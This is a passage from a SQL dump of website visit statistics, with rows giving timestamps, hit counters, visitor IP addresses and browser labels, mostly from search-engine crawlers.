130.180.218.218','chrome'),(148544,1503476997,1,1,0,0,'217.182.132.54','other'),(148545,1503477148,1,1,0,0,'66.249.81.67','chrome'),(148546,1503477223,1,1,0,0,'195.230.155.190','chrome'),(148547,1503477444,1,1,0,0,'5.45.207.64','other'),(148548,1503477571,2,2,0,0,'141.8.142.107','other'),(148549,1503477834,1,1,0,0,'178.93.235.201','chrome'),(148550,1503478311,1,1,0,0,'217.182.132.152','other'),(148551,1503478561,1,1,0,0,'37.73.218.139','chrome'),(148552,1503478679,7,7,0,0,'216.244.66.246','other'),(148553,1503478715,1,1,0,0,'164.132.162.158','other'),(148554,1503478738,1,0,1,0,'66.249.66.156',''),(148555,1503478922,1,1,0,0,'141.8.142.107','other'),(148556,1503479382,1,1,0,0,'5.45.207.64','other'),(148557,1503479405,1,1,0,0,'178.154.200.7','other'),(148558,1503479494,1,1,0,0,'95.108.181.69','other'),(148559,1503479755,1,1,0,0,'137.74.207.108','other'),(148560,1503479870,1,1,0,0,'94.178.6.147','chrome'),(148561,1503480259,1,1,0,0,'94.178.45.100','chrome'),(148562,1503480378,1,1,0,0,'91.196.178.65','chrome'),(148563,1503481195,1,0,1,0,'68.180.228.221',''),(148564,1503481248,1,1,0,0,'51.255.64.106','other'),(148565,1503481477,1,1,0,0,'137.74.207.109','other'),(148566,1503481699,1,1,0,0,'94.178.110.239','firefox'),(148567,1503481754,1,0,1,0,'66.249.66.76',''),(148568,1503482191,1,1,0,0,'5.45.207.32','other'),(148569,1503482297,1,1,0,0,'37.55.76.77','chrome'),(148570,1503482520,1,1,0,0,'141.8.142.21','other'),(148571,1503482588,1,1,0,0,'141.8.183.5','other'),(148572,1503482913,1,1,0,0,'37.9.113.163','other'),(148573,1503482939,1,0,1,0,'68.180.228.221',''),(148574,1503483027,2,2,0,0,'141.8.183.1','other'),(148575,1503483191,3,3,0,0,'5.45.207.32','other'),(148576,1503483223,2,2,0,0,'141.8.142.107','other'),(148577,1503483373,1,0,1,0,'66.249.76.107',''),(148578,1503483449,3,3,0,0,'95.108.181.69','other'),(148579,1503483509,1,1,0,0,'51.255.65.34','other'),(148580,1503483580,3,3,0,0,'178.154.200.7','other'),(148581,1503483788,1,1,0,0,'178.154.200.27','other'),(148582,1503483898,1,1,0,0,'164.132.164.180','other'),(148583,1503483967,1,1,0,0,'185.105.116.95','chrome'),(148584,1503484184,1,1,0,0,'95.108.181.63','other'),(148585,1503484230,2,2,0,0,'213.180.203.32','other'),(148586,1503484292,1,1,0,0,'141.8.142.107','other'),(148587,1503484295,4,4,0,0,'216.244.66.194','other'),(148588,1503484333,1,1,0,0,'8.29.198.27','other'),(148589,1503484405,1,1,0,0,'141.8.142.45','other'),(148590,1503484651,1,0,1,0,'66.249.66.156',''),(148591,1503484716,1,1,0,0,'108.59.8.70','other'),(148592,1503484738,1,1,0,0,'141.8.142.21','other'),(148593,1503484936,1,1,0,0,'91.209.11.236','other'),(148594,1503485199,1,1,0,0,'46.174.162.192','chrome'),(148595,1503485242,1,1,0,0,'51.255.65.75','other'),(148596,1503485733,1,1,0,0,'137.74.207.119','other'),(148597,1503485800,1,1,0,0,'51.255.65.72','other'),(148598,1503486125,1,0,1,0,'66.249.76.107',''),(148599,1503486340,1,1,0,0,'185.105.116.95','firefox'),(148600,1503486463,1,1,0,0,'157.55.39.90','other'),(148601,1503486491,1,1,0,0,'151.80.27.118','other'),(148602,1503486642,1,1,0,0,'51.255.65.75','other'),(148603,1503486826,1,1,0,0,'51.255.65.58','other'),(148604,1503486879,1,1,0,0,'141.8.142.21','other'),(148605,1503486881,1,1,0,0,'91.196.178.162','chrome'),(148606,1503486918,1,1,0,0,'95.108.181.69','other'),(148607,1503487188,1,1,0,0,'91.196.178.66','firefox'),(148608,1503487382,1,1,0,0,'141.8.142.45','other'),(148609,1503487391,1,1,0,0,'157.55.39.90','other'),(148610,1503487740,1,1,0,0,'151.80.27.118','other'),(148611,1503488155,1,1,0,0,'51.255.71.131','other'),(148612,1503488360,14,14,0,0,'144.76.38.73','other'),(148613,1503488984,1,1,0,0,'46.211.157.93','other'),(148614,1503489477,1,1,0,0,'37.55.56.220','chrome'),(148615,1503489744,1,1,0,0,'91.196.178.38','chrome'),(148616,1503489845,5,5,0,0,'216.244.66.246','other'),(148617,1503489856,1,1,0,0,'141.8.142.21','other'),(148618,1503489870,2,2,0,0,'95.108.181.58','other'),(148619,1503490897,1,1,0,0,'5.164.110.22','msie'),(148620,1503491080,1,1,0,0,'176.193.225.87','msie'),(148621,1503492286,1,1,0,0,'95.135.89.42','chrome'),(148622,1503492425,1,1,0,0,'66.102.9.27','chrome'),(148623,1503492471,1,1,0,0,'216.244.66.194','other'),(148624,1503492621,1,0,1,0,'68.180.228.221',''),(148625,1503493427,1,1,0,0,'94.254.246.206','chrome'),(148626,1503493576,1,1,0,0,'213.180.203.32','other'),(148627,1503494526,1,1,0,0,'157.55.39.90','other'),(148628,1503495164,1,1,0,0,'8.29.198.26','other'),(148629,1503495287,1,1,0,0,'216.244.66.246','other'),(148630,1503495412,2,2,0,0,'216.244.66.194','other'),(148631,1503496043,1,0,1,0,'66.249.76.89',''),(148632,1503496319,12,12,0,0,'5.189.166.138','other'),(148633,1503496437,1,1,0,0,'40.77.167.109','other'),(148634,1503497524,1,1,0,0,'188.32.176.228','msie'),(148635,1503498125,1,1,0,0,'89.178.5.188','msie'),(148636,1503498361,5,5,0,0,'5.189.166.23','other'),(148637,1503498778,3,3,0,0,'216.244.66.246','other'),(148638,1503499288,1,1,0,0,'5.164.110.22','msie'),(148639,1503500782,1,1,0,0,'141.8.183.1','other'),(148640,1503502245,1,0,1,0,'66.249.66.155',''),(148641,1503502951,5,5,0,0,'216.244.66.194','other'),(148642,1503503183,1,0,1,0,'68.180.228.221',''),(148643,1503503744,1,1,0,0,'51.255.65.63','other'),(148644,1503503978,1,1,0,0,'137.74.201.99','other'),(148645,1503504146,1,1,0,0,'51.255.65.19','other'),(148646,1503504475,9,9,0,0,'216.244.66.194','other'),(148647,1503504711,1,1,0,0,'51.255.65.40','other'),(148648,1503504756,1,1,0,0,'157.55.39.90','other'),(148649,1503505121,1,0,1,0,'68.180.228.221',''),(148650,1503505350,1,1,0,0,'178.140.237.148','msie'),(148651,1503505826,1,1,0,0,'91.196.178.69','firefox'),(148652,1503505831,1,1,0,0,'5.164.79.150','msie'),(148653,1503505886,1,1,0,0,'154.16.149.35','chrome'),(148654,1503505973,1,1,0,0,'51.255.71.113','other'),(148655,1503506016,1,1,0,0,'8.29.198.25','other'),(148656,1503506232,1,0,1,0,'66.249.66.156',''),(148657,1503506777,1,1,0,0,'5.164.110.22','msie'),(148658,1503506891,1,1,0,0,'109.63.180.84','msie'),(148659,1503507117,1,1,0,0,'51.255.65.13','other'),(148660,1503507495,6,6,0,0,'216.244.66.246','other'),(148661,1503507898,1,1,0,0,'188.163.74.54','firefox'),(148662,1503507957,1,1,0,0,'213.180.203.32','other'),(148663,1503508055,1,0,1,0,'66.249.76.109',''),(148664,1503508089,1,1,0,0,'141.8.183.1','other'),(148665,1503508101,1,1,0,0,'51.255.65.96','other'),(148666,1503508181,1,1,0,0,'51.255.65.84','other'),(148667,1503508470,1,1,0,0,'217.182.132.155','other'),(148668,1503508562,1,1,0,0,'51.255.65.12','other'),(148669,1503508710,1,1,0,0,'91.209.11.236','other'),(148670,1503508723,1,1,0,0,'91.196.178.167','chrome'),(148671,1503509414,1,1,0,0,'217.182.132.59','other'),(148672,1503510248,1,1,0,0,'217.182.132.183','other'),(148673,1503510736,1,1,0,0,'46.188.106.162','msie'),(148674,1503512031,1,1,0,0,'217.182.132.31','other'),(148675,1503512110,1,1,0,0,'51.255.71.117','other'),(148676,1503512898,4,4,0,0,'216.244.66.194','other'),(148677,1503513416,2,0,2,0,'66.249.76.108',''),(148678,1503513801,1,1,0,0,'178.140.237.148','msie'),(148679,1503513828,1,1,0,0,'51.255.65.77','other'),(148680,1503513967,1,1,0,0,'157.55.39.90','other'),(148681,1503513996,1,0,1,0,'66.249.66.75',''),(148682,1503514308,1,1,0,0,'5.45.207.32','other'),(148683,1503514471,1,1,0,0,'5.164.79.150','msie'),(148684,1503514489,2,2,0,0,'158.69.254.103','other'),(148685,1503514795,1,1,0,0,'216.244.66.237','other'),(148686,1503514811,1,0,1,0,'68.180.228.221',''),(148687,1503515255,2,2,0,0,'91.209.11.236','other'),(148688,1503515429,1,1,0,0,'217.182.132.14','other'),(148689,1503515449,1,0,1,0,'66.249.76.91',''),(148690,1503515513,3,3,0,0,'216.244.66.194','other'),(148691,1503515616,1,1,0,0,'5.45.207.32','other'),(148692,1503515687,1,1,0,0,'37.147.100.158','msie'),(148693,1503515748,1,1,0,0,'176.193.225.87','msie'),(148694,1503515957,1,1,0,0,'40.77.167.44','other'),(148695,1503516191,1,1,0,0,'91.209.11.236','other'),(148696,1503516485,1,1,0,0,'157.55.39.90','other'),(148697,1503516648,1,0,1,0,'66.249.76.91',''),(148698,1503516778,1,0,1,0,'66.249.66.156',''),(148699,1503516848,1,1,0,0,'8.29.198.26','other'),(148700,1503517463,5,5,0,0,'216.244.66.246','other'),(148701,1503517684,2,2,0,0,'91.209.11.236','other'),(148702,1503518724,1,1,0,0,'91.209.11.236','other'),(148703,1503518796,1,1,0,0,'217.182.132.88','other'),(148704,1503518974,1,0,1,0,'68.180.228.221',''),(148705,1503519114,1,1,0,0,'217.182.132.6','other'),(148706,1503519823,1,1,0,0,'141.8.183.5','other'),(148707,1503519863,1,1,0,0,'185.105.116.95','opera'),(148708,1503519978,1,1,0,0,'217.182.132.176','other'),(148709,1503520207,1,1,0,0,'180.76.15.155','other'),(148710,1503521354,1,1,0,0,'141.8.183.1','other'),(148711,1503521416,1,1,0,0,'213.180.203.32','other'),(148712,1503521558,1,1,0,0,'141.8.142.107','other'),(148713,1503521592,1,1,0,0,'51.255.65.80','other'),(148714,1503521761,1,0,1,0,'68.180.228.221',''),(148715,1503521763,1,1,0,0,'64.246.165.150','firefox'),(148716,1503522338,3,3,0,0,'216.244.66.194','other'),(148717,1503522346,1,1,0,0,'40.77.167.109','other'),(148718,1503522924,2,0,2,0,'68.180.228.221',''),(148719,1503525010,1,0,1,0,'66.249.64.153',''),(148720,1503525611,1,1,0,0,'217.182.132.97','other'),(148721,1503526247,1,1,0,0,'141.8.142.45','other'),(148722,1503526404,1,1,0,0,'51.255.65.69','other'),(148723,1503526776,1,1,0,0,'5.45.207.32','other'),(148724,1503526833,2,2,0,0,'216.244.66.246','other'),(148725,1503526971,1,1,0,0,'157.55.39.90','other'),(148726,1503527087,1,1,0,0,'164.132.162.153','other'),(148727,1503527334,1,1,0,0,'217.182.132.85','other'),(148728,1503527683,1,1,0,0,'8.29.198.26','other'),(148729,1503527745,1,1,0,0,'137.74.207.164','other'),(148730,1503528407,3,3,0,0,'216.244.66.246','other'),(148731,1503528579,1,1,0,0,'51.255.65.50','other'),(148732,1503529449,1,1,0,0,'51.255.71.128','other'),(148733,1503529620,1,1,0,0,'107.167.108.187','other'),(148734,1503529627,1,0,1,0,'68.180.228.221',''),(148735,1503530810,1,1,0,0,'217.182.132.152','other'),(148736,1503531315,1,1,0,0,'40.77.167.109','other'),(148737,1503531342,1,1,0,0,'141.8.183.1','other'),(148738,1503531427,1,1,0,0,'51.255.71.101','other'),(148739,1503532259,3,3,0,0,'216.244.66.194','other'),(148740,1503532508,1,1,0,0,'51.255.65.87','other'),(148741,1503532842,1,1,0,0,'157.55.39.90','other'),(148742,1503532979,1,1,0,0,'51.255.65.94','other'),(148743,1503533031,1,1,0,0,'66.249.64.153','chrome'),(148744,1503533182,7,7,0,0,'5.9.106.230','other'),(148745,1503533984,1,1,0,0,'141.8.183.1','other'),(148746,1503533997,1,1,0,0,'51.255.65.62','other'),(148747,1503534183,1,1,0,0,'51.255.65.61','other'),(148748,1503534299,1,1,0,0,'185.105.116.95','chrome'),(148749,1503534596,1,1,0,0,'217.182.132.193','other'),(148750,1503534698,1,1,0,0,'216.244.66.246','other'),(148751,1503536023,1,1,0,0,'217.182.132.184','other'),(148752,1503536421,3,3,0,0,'216.244.66.194','other'),(148753,1503536519,1,1,0,0,'217.182.132.191','other'),(148754,1503536780,1,0,1,0,'66.249.64.30',''),(148755,1503536999,4,4,0,0,'216.244.66.246','other'),(148756,1503537422,1,1,0,0,'51.255.65.39','other'),(148757,1503537565,1,1,0,0,'51.255.65.33','other'),(148758,1503537630,1,1,0,0,'87.250.224.75','other'),(148759,1503537665,1,1,0,0,'217.182.132.36','other'),(148760,1503537842,1,1,0,0,'157.55.39.90','other'),(148761,1503537991,1,1,0,0,'217.182.132.60','other'),(148762,1503538513,1,1,0,0,'8.29.198.25','other'),(148763,1503538667,1,1,0,0,'216.244.66.246','other'),(148764,1503539174,1,1,0,0,'51.255.65.46','other'),(148765,1503539277,1,1,0,0,'213.180.203.32','other'),(148766,1503539580,1,1,0,0,'51.255.65.78','other'),(148767,1503539709,1,1,0,0,'51.255.65.93','other'),(148768,1503540542,1,1,0,0,'51.255.65.3','other'),(148769,1503540935,1,1,0,0,'217.182.132.179','other'),(148770,1503541558,1,1,0,0,'178.154.200.7','other'),(148771,1503541667,1,1,0,0,'51.255.65.22','other'),(148772,1503542978,4,4,0,0,'216.244.66.194','other'),(148773,1503544029,1,1,0,0,'178.154.200.7','other'),(148774,1503544102,1,1,0,0,'137.74.201.100','other'),(148775,1503544196,4,4,0,0,'216.244.66.194','other'),(148776,1503544312,1,1,0,0,'141.8.183.1','other'),(148777,1503544519,1,1,0,0,'46.185.115.80','firefox'),(148778,1503544701,1,1,0,0,'151.80.27.118','other'),(148779,1503545131,1,1,0,0,'217.182.132.16','other'),(148780,1503545913,1,1,0,0,'141.8.183.1','other'),(148781,1503546133,1,1,0,0,'51.255.71.114','other'),(148782,1503546210,1,1,0,0,'40.77.167.109','other'),(148783,1503546368,1,1,0,0,'137.74.207.110','other'),(148784,1503546767,3,3,0,0,'91.209.11.236','other'),(148785,1503546803,1,1,0,0,'217.182.132.31','other'),(148786,1503546905,1,1,0,0,'51.255.65.6','other'),(148787,1503547251,1,1,0,0,'51.255.65.44','other'),(148788,1503547414,1,0,1,0,'68.180.228.221',''),(148789,1503548414,1,1,0,0,'91.209.11.236','other'),(148790,1503548685,8,8,0,0,'216.244.66.246','other'),(148791,1503548751,1,1,0,0,'51.255.65.75','other'),(148792,1503548902,1,0,1,0,'68.180.228.221',''),(148793,1503549344,1,1,0,0,'8.29.198.25','other'),(148794,1503550186,1,1,0,0,'5.45.207.64','other'),(148795,1503550233,1,0,1,0,'68.180.228.221',''),(148796,1503550254,1,1,0,0,'217.182.132.187','other'),(148797,1503550388,1,0,1,0,'66.249.64.153',''),(148798,1503550871,1,1,0,0,'51.255.65.21','other'),(148799,1503551456,1,1,0,0,'51.255.71.98','other'),(148800,1503551779,1,1,0,0,'81.1.242.33','other'),(148801,1503551909,1,1,0,0,'51.255.65.80','other'),(148802,1503552728,1,1,0,0,'180.76.15.16','other'),(148803,1503553306,1,1,0,0,'40.77.167.109','other'),(148804,1503553317,1,1,0,0,'157.55.39.90','other'),(148805,1503553519,1,1,0,0,'217.182.132.91','other'),(148806,1503553587,1,1,0,0,'66.249.64.29','chrome'),(148807,1503553989,8,8,0,0,'216.244.66.194','other'),(148808,1503554211,1,1,0,0,'217.69.133.218','other'),(148809,1503554296,3,3,0,0,'91.209.11.236','other'),(148810,1503554593,1,1,0,0,'217.182.132.6','other'),(148811,1503555398,1,1,0,0,'217.182.132.21','other'),(148812,1503555930,1,1,0,0,'95.108.181.69','other'),(148813,1503555962,1,1,0,0,'91.209.11.236','other'),(148814,1503556977,1,1,0,0,'5.45.207.32','other'),(148815,1503557341,1,1,0,0,'91.209.11.236','other'),(148816,1503557461,1,1,0,0,'51.255.71.133','other'),(148817,1503558402,7,7,0,0,'216.244.66.246','other'),(148818,1503558702,1,1,0,0,'51.255.71.128','other'),(148819,1503558793,8,8,0,0,'69.30.198.178','other'),(148820,1503559071,1,1,0,0,'91.209.11.236','other'),(148821,1503559480,1,1,0,0,'40.77.167.44','other'),(148822,1503559982,1,1,0,0,'51.255.65.67','other'),(148823,1503560180,1,1,0,0,'8.29.198.27','other'),(148824,1503560289,1,1,0,0,'213.180.203.32','other'),(148825,1503560580,2,2,0,0,'91.209.11.236','other'),(148826,1503560629,1,1,0,0,'162.210.196.129','other'),(148827,1503560686,1,1,0,0,'95.108.181.63','other'),(148828,1503561267,4,4,0,0,'216.244.66.194','other'),(148829,1503561556,1,1,0,0,'66.249.93.202','chrome'),(148830,1503561589,1,1,0,0,'157.55.39.90','other'),(148831,1503561592,1,1,0,0,'66.249.93.205','chrome'),(148832,1503561610,1,1,0,0,'66.249.93.204','chrome'),(148833,1503562722,4,4,0,0,'216.244.66.194','other'),(148834,1503562816,2,2,0,0,'91.209.11.236','other'),(148835,1503563605,1,1,0,0,'91.196.178.136','chrome'),(148836,1503563649,1,1,0,0,'180.76.15.33','other'),(148837,1503564026,4,4,0,0,'46.229.168.68','other'),(148838,1503564044,3,3,0,0,'46.229.168.65','other'),(148839,1503564074,5,5,0,0,'46.229.168.78','other'),(148840,1503564080,1,1,0,0,'46.229.168.79','other'),(148841,1503564116,3,3,0,0,'46.229.168.76','other'),(148842,1503564117,2,2,0,0,'46.229.168.77','other'),(148843,1503564145,3,3,0,0,'46.229.168.66','other'),(148844,1503564171,11,11,0,0,'46.229.168.72','other'),(148845,1503564190,10,10,0,0,'46.229.168.75','other'),(148846,1503564221,7,7,0,0,'46.229.168.80','other'),(148847,1503564280,6,6,0,0,'46.229.168.70','other'),(148848,1503564463,4,4,0,0,'46.229.168.74','other'),(148849,1503564472,3,3,0,0,'91.209.11.236','other'),(148850,1503564519,1,1,0,0,'51.255.71.119','other'),(148851,1503564556,1,0,1,0,'66.249.64.153',''),(148852,1503564590,6,6,0,0,'46.229.168.71','other'),(148853,1503564736,3,3,0,0,'46.229.168.67','other'),(148854,1503564804,1,1,0,0,'5.45.207.32','other'),(148855,1503564860,5,5,0,0,'46.229.168.73','other'),(148856,1503565012,1,1,0,0,'217.182.132.150','other'),(148857,1503565021,1,1,0,0,'157.55.39.90','other'),(148858,1503565120,6,6,0,0,'46.229.168.79','other'),(148859,1503565173,1,1,0,0,'46.229.168.75','other'),(148860,1503565191,3,3,0,0,'46.229.168.80','other'),(148861,1503565222,10,10,0,0,'46.229.168.68','other'),(148862,1503565355,3,3,0,0,'46.229.168.69','other'),(148863,1503565392,3,3,0,0,'46.229.168.72','other'),(148864,1503565447,4,4,0,0,'46.229.168.76','other'),(148865,1503565558,3,3,0,0,'46.229.168.74','other'),(148866,1503565584,1,1,0,0,'217.182.132.156','other'),(148867,1503565599,3,3,0,0,'46.229.168.71','other'),(148868,1503565613,2,2,0,0,'46.229.168.77','other'),(148869,1503565756,3,3,0,0,'46.229.168.70','other'),(148870,1503566161,1,1,0,0,'37.9.113.94','other'),(148871,1503566351,1,1,0,0,'37.73.203.123','chrome'),(148872,1503566374,1,1,0,0,'178.154.200.7','other'),(148873,1503566571,1,1,0,0,'217.182.132.67','other'),(148874,1503566646,1,1,0,0,'5.45.207.32','other'),(148875,1503566823,1,1,0,0,'217.182.132.54','other'),(148876,1503566859,1,1,0,0,'141.8.142.21','other'),(148877,1503567531,12,12,0,0,'193.200.241.230','other'),(148878,1503567974,1,1,0,0,'91.209.11.236','other'),(148879,1503568338,1,1,0,0,'217.182.132.241','other'),(148880,1503569103,1,1,0,0,'217.182.132.70','other'),(148881,1503569132,2,2,0,0,'216.244.66.246','other'),(148882,1503569174,1,1,0,0,'51.255.71.122','other'),(148883,1503569291,1,1,0,0,'51.255.65.49','other'),(148884,1503569589,1,1,0,0,'216.244.66.194','other'),(148885,1503569828,1,1,0,0,'213.180.203.32','other'),(148886,1503569897,1,1,0,0,'51.255.65.70','other'),(148887,1503570550,1,1,0,0,'141.8.183.5','other'),(148888,1503570553,1,1,0,0,'40.77.167.44','other'),(148889,1503570569,1,1,0,0,'51.255.71.114','other'),(148890,1503570716,1,1,0,0,'217.69.133.218','other'),(148891,1503570929,77,77,0,0,'54.162.3.15','other'),(148892,1503571017,1,1,0,0,'8.29.198.25','other'),(148893,1503571024,1,1,0,0,'173.212.221.162','other'),(148894,1503571124,1,1,0,0,'217.182.132.153','other'),(148895,1503571227,1,1,0,0,'51.255.65.34','other'),(148896,1503571364,1,1,0,0,'5.45.207.15','other'),(148897,1503571439,1,1,0,0,'51.255.65.52','other'),(148898,1503572304,1,1,0,0,'51.255.65.27','other'),(148899,1503572715,1,0,1,0,'66.249.64.28',''),(148900,1503573319,1,1,0,0,'141.8.142.21','other'),(148901,1503573411,1,1,0,0,'217.182.132.66','other'),(148902,1503573956,2,2,0,0,'216.244.66.194','other'),(148903,1503574541,1,1,0,0,'178.154.200.7','other'),(148904,1503574911,1,1,0,0,'157.55.39.103','other'),(148905,1503574981,1,1,0,0,'51.255.65.50','other'),(148906,1503575270,1,1,0,0,'217.182.132.50','other'),(148907,1503575587,1,1,0,0,'217.182.132.62','other'),(148908,1503575634,1,1,0,0,'107.167.108.92','other'),(148909,1503576152,1,1,0,0,'216.244.66.246','other'),(148910,1503576375,1,1,0,0,'51.255.65.70','other'),(148911,1503577029,1,0,1,0,'66.249.64.155',''),(148912,1503577331,1,1,0,0,'87.250.224.54','other'),(148913,1503577406,1,1,0,0,'137.74.201.99','other'),(148914,1503577613,1,1,0,0,'51.255.65.78','other'),(148915,1503578403,1,1,0,0,'51.255.65.91','other'),(148916,1503578422,1,1,0,0,'217.182.132.171','other'),(148917,1503579080,1,1,0,0,'141.8.183.1','other'),(148918,1503579144,13,13,0,0,'216.244.66.246','other'),(148919,1503579255,1,0,1,0,'66.249.64.29',''),(148920,1503579500,1,1,0,0,'142.4.200.37','other'),(148921,1503579503,1,1,0,0,'51.255.65.26','other'),(148922,1503579769,1,1,0,0,'213.180.203.32','other'),(148923,1503580463,1,1,0,0,'137.74.201.100','other'),(148924,1503581006,1,1,0,0,'95.108.181.69','other'),(148925,1503581851,1,1,0,0,'8.29.198.25','other'),(148926,1503582368,1,1,0,0,'5.45.207.64','other'),(148927,1503582395,5,5,0,0,'216.244.66.194','other'),(148928,1503582441,1,1,0,0,'141.8.183.1','other'),(148929,1503582963,1,0,1,0,'66.249.64.157',''),(148930,1503583941,1,1,0,0,'91.196.178.165','chrome'),(148931,1503584099,1,1,0,0,'164.132.162.159','other'),(148932,1503584294,2,0,2,0,'68.180.228.221',''),(148933,1503586308,1,1,0,0,'217.182.132.153','other'),(148934,1503586311,1,1,0,0,'217.182.132.79','other'),(148935,1503586549,1,1,0,0,'180.76.15.14','other'),(148936,1503586933,1,1,0,0,'37.9.113.180','other'),(148937,1503587316,1,1,0,0,'51.255.65.37','other'),(148938,1503588372,1,1,0,0,'217.182.132.154','other'),(148939,1503588549,1,1,0,0,'180.76.15.139','other'),(148940,1503588579,1,1,0,0,'157.55.39.90','other'),(148941,1503588762,5,5,0,0,'216.244.66.246','other'),(148942,1503588860,1,1,0,0,'95.108.181.69','other'),(148943,1503589801,5,5,0,0,'216.244.66.194','other'),(148944,1503590200,1,1,0,0,'178.154.200.7','other'),(148945,1503590204,1,1,0,0,'37.115.109.129','chrome'),(148946,1503590378,1,1,0,0,'217.182.132.147','other'),(148947,1503590802,1,1,0,0,'51.255.71.123','other'),(148948,1503590842,1,1,0,0,'51.255.65.58','other'),(148949,1503590973,5,5,0,0,'216.244.66.194','other'),(148950,1503591213,1,1,0,0,'51.255.71.115','other'),(148951,1503591558,1,0,1,0,'66.249.64.155',''),(148952,1503591567,1,1,0,0,'217.182.132.86','other'),(148953,1503592121,1,1,0,0,'95.108.181.63','other'),(148954,1503592202,1,1,0,0,'217.182.132.185','other'),(148955,1503592359,1,0,1,0,'68.180.228.221',''),(148956,1503592483,1,1,0,0,'217.182.132.25','other'),(148957,1503592674,1,1,0,0,'217.182.132.67','other'),(148958,1503592684,1,1,0,0,'8.29.198.27','other'),(148959,1503593283,1,1,0,0,'217.182.132.69','other'),(148960,1503593412,1,1,0,0,'51.255.65.21','other'),(148961,1503593659,1,1,0,0,'213.180.203.32','other'),(148962,1503593723,1,1,0,0,'66.249.64.30','chrome'),(148963,1503593830,1,1,0,0,'217.182.132.90','other'),(148964,1503593849,1,1,0,0,'217.182.132.15','other'),(148965,1503593994,1,1,0,0,'217.182.132.156','other'),(148966,1503594049,1,1,0,0,'51.255.65.55','other'),(148967,1503594391,1,1,0,0,'141.8.142.45','other'),(148968,1503594870,1,1,0,0,'37.53.225.101','chrome'),(148969,1503594905,1,1,0,0,'81.1.242.33','other'),(148970,1503594906,1,1,0,0,'81.1.242.33','msie'),(148971,1503594998,1,1,0,0,'141.8.142.21','other'),(148972,1503595219,1,1,0,0,'91.196.178.33','chrome'),(148973,1503595220,1,1,0,0,'217.182.132.72','other'),(148974,1503595319,1,1,0,0,'51.255.65.72','other'),(148975,1503595345,1,1,0,0,'91.196.102.122','chrome'),(148976,1503595381,1,1,0,0,'163.172.255.19','chrome'),(148977,1503595568,1,1,0,0,'217.182.132.183','other'),(148978,1503596415,1,1,0,0,'141.8.142.45','other'),(148979,1503596522,1,1,0,0,'216.244.66.246','other'),(148980,1503596660,1,1,0,0,'164.132.164.180','other'),(148981,1503596839,1,1,0,0,'164.132.162.164','other'),(148982,1503597228,1,1,0,0,'91.196.178.161','chrome'),(148983,1503597526,1,1,0,0,'95.84.255.124','msie'),(148984,1503597527,1,1,0,0,'176.193.122.29','msie'),(148985,1503597758,1,1,0,0,'141.8.142.21','other'),(148986,1503597768,1,1,0,0,'217.182.132.154','other'),(148987,1503598250,1,1,0,0,'217.182.132.84','other'),(148988,1503598293,1,1,0,0,'51.255.65.9','other'),(148989,1503598503,1,1,0,0,'51.255.65.22','other'),(148990,1503598610,1,1,0,0,'216.244.66.194','other'),(148991,1503598706,1,1,0,0,'81.1.242.33','other'),(148992,1503598729,1,1,0,0,'95.108.181.69','other'),(148993,1503598735,1,1,0,0,'213.180.203.32','other'),(148994,1503598761,1,1,0,0,'217.182.132.28','other'),(148995,1503599725,1,1,0,0,'217.69.133.9','other'),(148996,1503599960,1,1,0,0,'180.76.15.30','other'),(148997,1503600157,1,1,0,0,'185.137.17.5','chrome'),(148998,1503600201,1,1,0,0,'51.255.65.45','other'),(148999,1503600307,3,3,0,0,'216.244.66.246','other'),(149000,1503600446,1,1,0,0,'51.255.65.2','other'),(149001,1503600561,1,1,0,0,'217.182.132.192','other'),(149002,1503600987,1,1,0,0,'37.9.113.163','other'),(149003,1503601464,1,1,0,0,'217.182.132.183','other'),(149004,1503601740,1,1,0,0,'51.255.65.54','other'),(149005,1503601758,1,1,0,0,'51.255.65.15','other'),(149006,1503601823,1,1,0,0,'51.255.65.26','other'),(149007,1503601845,1,0,1,0,'66.249.64.28',''),(149008,1503602200,1,1,0,0,'178.154.200.7','other'),(149009,1503602277,1,1,0,0,'40.77.167.44','other'),(149010,1503603412,1,1,0,0,'51.255.71.120','other'),(149011,1503603524,1,1,0,0,'8.29.198.25','other'),(149012,1503604200,1,1,0,0,'51.255.65.64','other'),(149013,1503604684,1,1,0,0,'40.77.167.109','other'),(149014,1503604804,1,1,0,0,'188.166.73.4','chrome'),(149015,1503604960,1,1,0,0,'141.8.142.45','other'),(149016,1503605050,1,1,0,0,'217.69.133.4','other'),(149018,1503605313,1,1,0,0,'180.76.15.149','other'),(149019,1503605530,1,1,0,0,'217.69.133.2','other'),(149020,1503605548,2,2,0,0,'217.69.133.203','other'),(149021,1503605553,1,1,0,0,'120.132.52.196','chrome'),(149022,1503605611,1,1,0,0,'217.69.133.5','other'),(149023,1503605770,1,1,0,0,'207.154.231.152','chrome'),(149024,1503605872,1,1,0,0,'217.182.132.66','other'),(149025,1503606174,1,1,0,0,'137.74.201.99','other'),(149026,1503606299,1,0,1,0,'68.180.228.221',''),(149027,1503606564,1,1,0,0,'217.182.132.179','other'),(149028,1503607123,1,1,0,0,'51.255.71.127','other'),(149029,1503607591,1,1,0,0,'51.255.65.59','other'),(149030,1503607771,1,1,0,0,'94.254.244.191','chrome'),(149031,1503607772,8,8,0,0,'216.244.66.246','other'),(149032,1503609171,1,1,0,0,'141.8.142.21','other'),(149033,1503609210,1,1,0,0,'51.255.65.7','other'),(149034,1503609443,1,1,0,0,'51.255.65.66','other'),(149035,1503609455,1,0,1,0,'66.249.76.91',''),(149036,1503610063,1,1,0,0,'137.74.201.100','other'),(149037,1503610809,1,1,0,0,'137.74.207.161','other'),(149038,1503611012,1,1,0,0,'217.69.133.4','other'),(149039,1503611121,1,1,0,0,'51.255.65.52','other'),(149040,1503611161,1,1,0,0,'51.255.71.118','other'),(149041,1503611390,1,1,0,0,'137.74.207.120','other'),(149042,1503611394,1,1,0,0,'178.137.83.166','chrome'),(149043,1503611798,1,1,0,0,'151.80.27.118','other'),(149044,1503612410,1,1,0,0,'217.182.132.63','other'),(149045,1503612517,1,1,0,0,'51.255.65.39','other'),(149046,1503612875,1,1,0,0,'217.182.132.179','other'),(149047,1503613411,1,1,0,0,'217.182.132.90','other'),(149048,1503613535,1,1,0,0,'217.182.132.149','other'),(149049,1503614205,1,1,0,0,'51.255.71.132','other'),(149050,1503614364,1,1,0,0,'8.29.198.27','other'),(149051,1503614620,1,1,0,0,'141.8.183.5','other'),(149052,1503614708,1,1,0,0,'95.108.181.63','other'),(149053,1503614769,1,1,0,0,'51.255.65.32','other'),(149054,1503614970,1,1,0,0,'217.182.132.71','other'),(149055,1503615271,1,0,1,0,'66.249.66.156',''),(149056,1503615273,1,1,0,0,'217.182.132.51','other'),(149057,1503616084,1,0,1,0,'66.249.76.108',''),(149058,1503616503,1,1,0,0,'217.182.132.86','other'),(149059,1503616933,1,1